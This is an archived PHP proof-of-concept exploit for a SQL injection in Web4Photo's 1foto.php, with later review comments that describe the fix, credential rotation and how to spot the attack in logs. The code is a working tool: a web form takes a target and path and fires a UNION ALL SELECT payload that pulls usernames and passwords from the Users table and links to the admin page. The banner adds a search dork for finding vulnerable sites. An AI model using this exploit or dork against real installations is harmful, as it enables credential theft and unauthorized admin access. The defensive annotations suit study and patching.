Web4Photo (1foto.php i) Remote SQL Injection Exploit
<?php /*
 * Archived proof-of-concept for a SQL injection in Web4Photo's 1foto.php,
 * reached through the `i` query parameter.
 *
 * What the script does: on form submit it issues a single GET to
 * http://<target><path>1foto.php with a UNION ALL SELECT in `i`, placing
 * concat(username, ':', userpass) from the `Users` table in the 11th of 17
 * columns, then scrapes the result from the <div id="fotonadpis"> element
 * of the response.
 *
 * NOTE(review): the source of 1foto.php is not on this page; presumably it
 * interpolates `i` unquoted into a 17-column SELECT whose 11th column is
 * rendered in that div. Confirm against the application code.
 *
 * Defender view:
 *  - Fix: validate or cast `i` to an integer and bind it as a query
 *    parameter instead of building the SQL string from it.
 *  - NOTE(review): `userpass` is read as-is; check whether that column holds
 *    plaintext or a fast unsalted hash and migrate to password_hash() if so.
 *    Rotate credentials on any install where this request shows up in logs.
 *  - Detection: access-log entries for 1foto.php whose `i` value is not a
 *    plain integer, in particular ones containing "union" and "select"
 *    (URL-encoded spaces appear as %20).
 */
if (isset($_POST['injection'])) {
    // Both values are taken from the form and concatenated into the request
    // URL below with no validation or encoding.
    $target = $_POST['target'];
    $path = $_POST['path'];
    // The pattern captures the two colon-separated fields rendered inside the
    // fotonadpis div; the greedy (.*) groups split on the last ':' in the line.
    if(preg_match('/<div id="fotonadpis">(.*):(.*)<\/div>/',
        // Server-side fetch of the crafted URL. file_get_contents() returns
        // false on a failed request, which simply fails to match.
        file_get_contents('http://'.$target.$path.'1foto.php?i=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,concat(username,char(58),userpass),12,13,14,15,16,17%20from%20Users'),
        $user))
        // The captured values and $target are echoed without HTML escaping,
        // so whatever the remote host returned in that div is rendered as markup.
        echo($user[1]. ":" .$user[2]. "\n<br />\n<a href=\"http://$target/admin\">Admin</a>\n");
    else
        // Reached for a patched install, a different page layout, and a failed
        // fetch alike; the message does not distinguish between them.
        echo("Not exploitable..");
} ?> <pre> ########################################################## # WebPhoto SQL Injection Exploit # Vendor: http://www.web4photo.net # Live demo: http://demo.web4photo.cz # d0rk: "powered by web4photo.net by Panoramas.cz" # Coded by -=M.o.B=- # Israel # Contact: hax0r@windowslive.com ##########################################################</pre> <form method="post"> Target:<br /><input type="text" name="target" /><br /> Path:<br /><input type="text" name="path" /><br /> <input type="submit" name="injection" value="1nJ3cT" /> </form>